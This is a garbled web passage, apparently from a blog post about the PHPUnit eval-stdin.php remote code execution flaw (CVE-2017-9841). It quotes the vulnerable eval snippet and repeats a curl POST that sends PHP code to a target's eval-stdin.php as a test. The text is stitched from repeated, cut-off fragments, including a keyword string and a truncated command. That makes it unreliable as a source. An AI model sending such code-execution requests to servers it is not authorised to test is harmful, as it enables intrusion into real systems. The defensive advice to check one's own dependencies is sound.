curl -X POST https://target.com/eval-stdin.php -d "<?php echo 5*5; ?>" If the response contains 25 , it is 100% vulnerable. The vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php exploit is a masterclass in how a developer convenience tool becomes a production nightmare.
In the ecosystem of web application security, few vulnerabilities have caused as widespread, silent, and persistent damage as the PHPUnit eval-stdin Remote Code Execution (RCE) vulnerability (tracked as CVE-2017-9841 ). vendor phpunit phpunit src util php eval-stdin.php exploit
Check your servers today. Run the find command. That ghost might be lurking in your dependencies, waiting for a POST request. curl -X POST https://target
<?php // vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php while (($input = file_get_contents('php://input')) !== '') eval('?>' . $input); curl -X POST https://target.com/eval-stdin.php -d "<